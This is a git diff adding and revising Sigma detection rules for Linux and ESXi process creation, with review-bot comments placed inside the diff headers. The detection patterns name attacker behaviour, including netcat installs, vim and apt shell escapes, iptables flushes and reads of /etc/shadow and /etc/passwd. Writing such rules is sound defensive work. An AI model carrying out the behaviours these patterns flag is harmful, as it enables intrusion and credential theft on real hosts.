+ - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html
+author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.discovery
+ - attack.t1033
+ - attack.t1007
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/esxcli'
+ CommandLine|contains: 'storage'
+ selection_cli:
+ CommandLine|contains:
+ - ' get'
+ - ' list'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administration activities
+# Note: level can be reduced to low in some envs
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml
new file mode 100644
index 000000000..bdbb0d9b4
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml
@@ -0,0 +1,28 @@
+title: ESXi Syslog Configuration Change Via ESXCLI
+id: 38eb1dbb-011f-40b1-a126-cf03a0210563
+status: experimental
+description: Detects changes to the ESXi syslog configuration via "esxcli"
+references:
+ - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html
+author: Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+ - attack.t1562.003
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/esxcli'
+ CommandLine|contains|all:
+ - 'system'
+ - 'syslog'
+ - 'config'
+ CommandLine|contains: ' set'
+ condition: selection
+falsepositives:
+ - Legitimate administrative activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml
new file mode 100644
index 000000000..d08272019
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml
@@ -0,0 +1,28 @@
+title: ESXi System Information Discovery Via ESXCLI
+id: e80273e1-9faf-40bc-bd85-dbaff104c4e9
+status: experimental
+description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
+references:
+ - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html
+author: Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.discovery
+ - attack.t1033
+ - attack.t1007
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/esxcli'
+ CommandLine|contains: 'system'
+ selection_cli:
+ CommandLine|contains:
+ - ' get'
+ - ' list'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml
new file mode 100644
index 000000000..addf67f9b
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml
@@ -0,0 +1,25 @@
+title: ESXi Account Creation Via ESXCLI
+id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db
+status: experimental
+description: Detects user account creation on ESXi system via esxcli
+references:
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html
+author: Cedric Maurugeon
+date: 2023/08/22
+tags:
+ - attack.persistence
+ - attack.t1136
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/esxcli'
+ CommandLine|contains|all:
+ - 'system '
+ - 'account '
+ - 'add '
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml
new file mode 100644
index 000000000..0bdd6fe88
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml
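Review bot: `attack.t1136` is the parent technique; `esxcli system account add` creates a local ESXi account, so the sub-technique `attack.t1136.001` (Create Account: Local Account) is the precise tag and matches how the other rules in this commit use sub-techniques (for example `t1070.004`, `t1553.004`). The `contains|all` on `'system '`, `'account '` and `'add '` does not enforce token order, which is fine for esxcli's fixed namespace syntax but worth a one-line comment so the next editor does not "tighten" it into an ordered regex without reason.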
@@ -0,0 +1,27 @@
+title: ESXi VM List Discovery Via ESXCLI
+id: 5f1573a7-363b-4114-9208-ad7a61de46eb
+status: experimental
+description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
+references:
+ - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html
+ - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
+ - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
+author: Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.discovery
+ - attack.t1033
+ - attack.t1007
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/esxcli'
+ CommandLine|contains: 'vm process'
+ CommandLine|endswith: ' list'
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml
new file mode 100644
index 000000000..5e69c617b
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml
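Review bot: `CommandLine|endswith: ' list'` is stricter than the sibling esxcli discovery rules, which use `CommandLine|contains` for `' get'`/`' list'`, and any trailing argument or whitespace after `list` (a formatter option placed last, for instance) would keep a genuine `esxcli vm process list` invocation from matching. Replacing the two `CommandLine` keys with `CommandLine|contains|all:` holding `- 'vm process'` and `- ' list'` keeps the intent and aligns the rule with the `vm kill` rule that follows it.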
@@ -0,0 +1,26 @@
+title: ESXi VM Kill Via ESXCLI
+id: 2992ac4d-31e9-4325-99f2-b18a73221bb2
+status: experimental
+description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
+references:
+ - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html
+ - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
+ - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
+author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/esxcli'
+ CommandLine|contains|all:
+ - 'vm process'
+ - 'kill'
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml
new file mode 100644
index 000000000..c7ebfe228
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml
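Review bot: `tags` holds only `attack.execution` with no technique id; the cited references describe ransomware terminating VMs before encryption, which is `attack.impact` / `attack.t1489` (Service Stop) rather than plain execution. Adding those two tags next to (or in place of) `attack.execution` brings the rule in line with the sibling esxcli rules in this commit, all of which carry a technique. The `'kill'` pattern has no leading space unlike the other rules' `' get'`/`' list'`; `' kill'` would avoid matching it inside a longer token.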
@@ -0,0 +1,30 @@
+title: ESXi VSAN Information Discovery Via ESXCLI
+id: d54c2f06-aca9-4e2b-81c9-5317858f4b79
+status: experimental
+description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
+references:
+ - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html
+ - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html
+ - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html
+author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
+date: 2023/09/04
+tags:
+ - attack.discovery
+ - attack.t1033
+ - attack.t1007
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/esxcli'
+ CommandLine|contains: 'vsan'
+ selection_cli:
+ CommandLine|contains:
+ - ' get'
+ - ' list'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administration activities
+# Note: level can be reduced to low in some envs
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml
index ca2781257..a7c0e3ce8 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml
@@ -1,30 +1,30 @@
-title: File and Directory Discovery
+title: File and Directory Discovery - Linux
 id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72
 status: test
 description: Detects usage of system utilities to discover files and directories
-author: Daniil Yugoslavskiy, oscd.community
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
+author: Daniil Yugoslavskiy, oscd.community
 date: 2020/10/19
-modified: 2021/11/27
+modified: 2022/11/25
+tags:
+ - attack.discovery
+ - attack.t1083
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- select_file_with_asterisk:
- Image|endswith: '/file'
- CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline
- select_recursive_ls:
- Image|endswith: '/ls'
- CommandLine|contains: '-R'
- select_find_execution:
- Image|endswith: '/find'
- select_tree_execution:
- Image|endswith: '/tree'
- condition: 1 of select*
+ select_file_with_asterisk:
+ Image|endswith: '/file'
+ CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline
+ select_recursive_ls:
+ Image|endswith: '/ls'
+ CommandLine|contains: '-R'
+ select_find_execution:
+ Image|endswith: '/find'
+ select_tree_execution:
+ Image|endswith: '/tree'
+ condition: 1 of select*
 falsepositives:
- - Legitimate activities
+ - Legitimate activities
 level: informational
-tags:
- - attack.discovery
- - attack.t1083
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml
index 391975730..47adf83de 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml
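Review bot: The `CommandLine|re: '(.){200,}'` pattern carried over on the new side keeps a capturing group that is re-bound on each of the 200+ repetitions and contributes nothing to the match; `.{200,}` is equivalent and cheaper on backends that evaluate the regex per event. The rest of the hunk only renames the title, pins the reference commit and reindents, so this is the one line worth touching while the file is being rewritten anyway.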
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml
@@ -1,11 +1,15 @@
 title: File Deletion
 id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57
 status: stable
-description: Detects file deletion commands
+description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
 author: Ömer Günal, oscd.community
 date: 2020/10/07
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md
+modified: 2022/09/15
+tags:
+ - attack.defense_evasion
+ - attack.t1070.004
 logsource:
 product: linux
 category: process_creation
@@ -14,10 +18,8 @@ detection:
 Image|endswith:
 - '/rm' # covers /rmdir as well
 - '/shred'
+ - '/unlink'
 condition: selection
 falsepositives:
 - Legitimate administration activities
 level: informational
-tags:
- - attack.defense_evasion
- - attack.t1070.004
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml
new file mode 100644
index 000000000..73eaf0076
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml
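Review bot: The comment `# covers /rmdir as well` on the `'/rm'` entry in the second hunk is wrong for an `Image|endswith` match: `/usr/bin/rmdir` ends in `/rmdir`, not `/rm`, so it is never matched. Either drop the comment or add `- '/rmdir'` beside the new `- '/unlink'` entry if directory removal is meant to be covered, and mention it in the description that now enumerates the binaries. The enclosing `detection:`/`selection:` lines sit outside the hunk.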
@@ -0,0 +1,33 @@
+title: OS Architecture Discovery Via Grep
+id: d27ab432-2199-483f-a297-03633c05bae6
+status: experimental
+description: |
+ Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.discovery
+ - attack.t1082
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_process:
+ Image|endswith: '/grep'
+ selection_architecture:
+ CommandLine|endswith:
+ - 'aarch64'
+ - 'arm'
+ - 'i386'
+ - 'i686'
+ - 'mips'
+ - 'x86_64'
+ condition: all of selection_*
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml
new file mode 100644
index 000000000..6d10e5a4f
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml
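Review bot: `'arm'` as a bare `CommandLine|endswith` suffix also matches any grep whose last argument merely ends in those three letters (`alarm`, `farm`, `swarm`), which is the most likely false-positive source for this rule; the longer tokens are far less ambiguous. Anchoring the short one as `- ' arm'` (leading space) keeps the intent while avoiding suffix collisions, and `falsepositives: Unknown` could then name the remaining case, `- Administrators grepping architecture strings from uname or /proc/cpuinfo output`.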
@@ -0,0 +1,24 @@
+title: Group Has Been Deleted Via Groupdel
+id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84
+status: test
+description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
+references:
+ - https://linuxize.com/post/how-to-delete-group-in-linux/
+ - https://www.cyberciti.biz/faq/linux-remove-user-command/
+ - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
+ - https://linux.die.net/man/8/groupdel
+author: Tuan Le (NCSGroup)
+date: 2022/12/26
+tags:
+ - attack.impact
+ - attack.t1531
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith: '/groupdel'
+ condition: selection
+falsepositives:
+ - Legitimate administrator activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml
new file mode 100644
index 000000000..2ef7e1b58
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml
@@ -0,0 +1,25 @@
+title: Apt GTFOBin Abuse - Linux
+id: bb382fd5-b454-47ea-a264-1828e4c766d6
+status: test
+description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution
+references:
+ - https://gtfobins.github.io/gtfobins/apt/
+ - https://gtfobins.github.io/gtfobins/apt-get/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/12/28
+tags:
+ - attack.discovery
+ - attack.t1083
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith:
+ - '/apt'
+ - '/apt-get'
+ CommandLine|contains: 'APT::Update::Pre-Invoke::='
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
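Review bot: The apt rule's `tags` block labels a command-proxy detection as `attack.discovery` / `attack.t1083` (File and Directory Discovery), which contradicts its own description of "execute and proxy command and binary execution"; an execution-tactic pair (`attack.execution`, most likely `attack.t1059`) fits, and the vim GTFOBin rule in the next hunk carries the identical mismatch. The `'APT::Update::Pre-Invoke::='` string is a precise indicator, so only the tagging needs attention in both rules.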
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml
new file mode 100644
index 000000000..de4f854c3
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml
@@ -0,0 +1,39 @@
+title: Vim GTFOBin Abuse - Linux
+id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea
+status: test
+description: Detects usage of "vim" and it's siblings as a GTFOBin to execute and proxy command and binary execution
+references:
+ - https://gtfobins.github.io/gtfobins/vim/
+ - https://gtfobins.github.io/gtfobins/rvim/
+ - https://gtfobins.github.io/gtfobins/vimdiff/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/12/28
+tags:
+ - attack.discovery
+ - attack.t1083
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith:
+ - '/vim'
+ - '/rvim'
+ - '/vimdiff'
+ CommandLine|contains:
+ - ' -c '
+ - ' --cmd'
+ selection_cli:
+ CommandLine|contains:
+ - ':!/'
+ - ':py '
+ - ':lua '
+ - '/bin/sh'
+ - '/bin/bash'
+ - '/bin/dash'
+ - '/bin/zsh'
+ - '/bin/fish'
+ condition: all of selection_*
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml
index e1e66a138..ea8e6b830 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml
@@ -1,24 +1,24 @@
 title: Install Root Certificate
 id: 78a80655-a51e-4669-bc6b-e9d206a462ee
 status: test
-description: Detects installed new certificate
-author: Ömer Günal, oscd.community
+description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
+author: Ömer Günal, oscd.community
 date: 2020/10/05
-modified: 2021/11/27
+modified: 2022/07/07
+tags:
+ - attack.defense_evasion
+ - attack.t1553.004
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
- selection:
- Image|endswith:
- - '/update-ca-certificates'
- - '/update-ca-trust'
- condition: selection
+ selection:
+ Image|endswith:
+ - '/update-ca-certificates'
+ - '/update-ca-trust'
+ condition: selection
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: low
-tags:
- - attack.defense_evasion
- - attack.t1553.004
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml
new file mode 100644
index 000000000..48712c358
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml
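Review bot: `falsepositives` still lists only `Legitimate administration activities`, yet `update-ca-certificates` and `update-ca-trust` are, as far as I know, also run automatically from package hooks whenever the distribution's ca-certificates package is upgraded, so the rule will fire during routine patching. A second entry such as `- Package manager updates of the ca-certificates package` documents that; at `level: low` the detection logic itself is fine. Apart from the new description and pinned reference, the hunk only reorders metadata and reindents.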
@@ -0,0 +1,47 @@
+title: Suspicious Package Installed - Linux
+id: 700fb7e8-2981-401c-8430-be58e189e741
+status: test
+description: Detects installation of suspicious packages using system installation utilities
+references:
+ - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/03
+tags:
+ - attack.defense_evasion
+ - attack.t1553.004
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_tool_apt:
+ Image|endswith:
+ - '/apt'
+ - '/apt-get'
+ CommandLine|contains: 'install'
+ selection_tool_yum:
+ Image|endswith: '/yum'
+ CommandLine|contains:
+ - 'localinstall'
+ - 'install'
+ selection_tool_rpm:
+ Image|endswith: '/rpm'
+ CommandLine|contains: '-i'
+ selection_tool_dpkg:
+ Image|endswith: '/dpkg'
+ CommandLine|contains:
+ - '--install'
+ - '-i'
+ selection_keyword:
+ CommandLine|contains:
+ # Add more suspicious packages
+ - 'nmap'
+ - ' nc'
+ - 'netcat'
+ - 'wireshark'
+ - 'tshark'
+ - 'openconnect'
+ - 'proxychains'
+ condition: 1 of selection_tool_* and selection_keyword
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml
new file mode 100644
index 000000000..7c13288f2
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml
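Review bot: The `tags` block (`attack.defense_evasion`, `attack.t1553.004`) is Install Root Certificate, evidently copied from the neighbouring rule, and does not describe installing network tooling; `attack.t1105` (Ingress Tool Transfer) is the closer technique. Two patterns are also substring-loose: `selection_tool_rpm`'s `CommandLine|contains: '-i'` fires on `rpm --import` or any path containing `-i`, and `' nc'` in `selection_keyword` matches `ncurses`, `ncdu` and similar common package names. Using `' nc '` together with a second `CommandLine|endswith: ' nc'` key (as its own selection) keeps the netcat intent without the prefix collisions, and the `dpkg` `'-i'` entry has the same weakness, though `--install` beside it limits the damage.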
@@ -0,0 +1,41 @@
+title: Flush Iptables Ufw Chain
+id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab
+status: test
+description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
+references:
+ - https://blogs.blackberry.com/
+ - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html
+ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/01/18
+tags:
+ - attack.defense_evasion
+ - attack.t1562.004
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_img:
+ Image|endswith:
+ - '/iptables'
+ - '/xtables-legacy-multi'
+ - '/iptables-legacy-multi'
+ - '/ip6tables'
+ - '/ip6tables-legacy-multi'
+ selection_params:
+ CommandLine|contains:
+ - '-F'
+ - '-Z'
+ - '-X'
+ selection_ufw:
+ CommandLine|contains:
+ - 'ufw-logging-deny'
+ - 'ufw-logging-allow'
+ - 'ufw6-logging-deny'
+ - 'ufw6-logging-allow'
+ # - 'ufw-reject-output'
+ # - 'ufw-track-inputt'
+ condition: all of selection_*
+falsepositives:
+ - Network administrators
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml
new file mode 100644
index 000000000..1ebfc0e5c
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_kill_process.yml
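Review bot: The first reference, `https://blogs.blackberry.com/`, is a site root rather than a citation, so a reader cannot follow it to the source of the ufw chain names; the same bare URL is reused in the hidepid rule later in this commit. Replacing it with the specific post, or dropping it in favour of the tweet and cyberciti links that remain, fixes both. The two commented-out chain names (`# - 'ufw-reject-output'`, `# - 'ufw-track-inputt'`) are left in the selection with no explanation and the second looks misspelled; either verify and enable them or remove them so the list does not look half-finished.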
@@ -0,0 +1,25 @@
+title: Terminate Linux Process Via Kill
+id: 64c41342-6b27-523b-5d3f-c265f3efcdb3
+status: test
+description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
+references:
+ - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
+ - https://www.cyberciti.biz/faq/how-force-kill-process-linux/
+author: Tuan Le (NCSGroup)
+date: 2023/03/16
+tags:
+ - attack.defense_evasion
+ - attack.t1562
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|endswith:
+ - '/kill'
+ - '/pkill'
+ - '/killall'
+ condition: selection
+falsepositives:
+ - Likely
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml
index 2b1791a11..8bd382f44 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_account.yml
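Review bot: In bash, sh and zsh `kill` is a shell builtin, so only an explicit external `kill` binary produces a process_creation event; the `'/kill'` entry will miss most interactive and scripted use, while `pkill` and `killall` are always separate executables and are reliably seen. That limitation belongs in the rule so analysts do not read an absence of hits as an absence of kills, e.g. a comment on the entry: `# Note: kill is usually a shell builtin, only the external binary is visible in process_creation`. `falsepositives: Likely` is an honest fit for `level: low`.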
@@ -1,34 +1,39 @@
-title: Local System Accounts Discovery
+title: Local System Accounts Discovery - Linux
 id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c
 status: test
-description: Detects enumeration of local systeam accounts
-author: Alejandro Ortuno, oscd.community
+description: Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
+author: Alejandro Ortuno, oscd.community
 date: 2020/10/08
-modified: 2021/11/27
+modified: 2022/11/27
+tags:
+ - attack.discovery
+ - attack.t1087.001
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection_1:
- Image|endswith: '/lastlog'
- selection_2:
- CommandLine|contains: '''x:0:'''
- selection_3:
- Image|endswith: '/cat'
- CommandLine|contains:
- - '/etc/passwd'
- - '/etc/sudoers'
- selection_4:
- Image|endswith: '/id'
- selection_5:
- Image|endswith: '/lsof'
- CommandLine|contains: '-u'
- condition: 1 of selection*
+ selection_1:
+ Image|endswith: '/lastlog'
+ selection_2:
+ CommandLine|contains: '''x:0:'''
+ selection_3:
+ Image|endswith:
+ - '/cat'
+ - '/head'
+ - '/tail'
+ - '/more'
+ CommandLine|contains:
+ - '/etc/passwd'
+ - '/etc/shadow'
+ - '/etc/sudoers'
+ selection_4:
+ Image|endswith: '/id'
+ selection_5:
+ Image|endswith: '/lsof'
+ CommandLine|contains: '-u'
+ condition: 1 of selection*
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: low
-tags:
- - attack.discovery
- - attack.t1087.001
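Review bot: The new `'/etc/shadow'` entry in `selection_3` turns a read of the password-hash file into a `level: low` account-discovery hit tagged `attack.t1087.001`; reading `/etc/shadow` is credential access (`attack.t1003.008`) and deserves its own selection or rule at a higher level rather than sharing `1 of selection*` with `id` and `lastlog`. Separately, `selection_2`'s `'''x:0:'''` matches only the single-quoted form `'x:0:'` in the command line; the unquoted pattern `'x:0:'` would also cover `grep x:0:` and double-quoted invocations. The description still carries the `systeam` typo from the old line.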
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml
index 5ba646c21..3cfe8edcd 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_local_groups.yml
@@ -1,25 +1,29 @@
-title: Local Groups Discovery
+title: Local Groups Discovery - Linux
 id: 676381a6-15ca-4d73-a9c8-6a22e970b90d
 status: test
-description: Detects enumeration of local system groups
-author: Ömer Günal, Alejandro Ortuno, oscd.community
+description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md
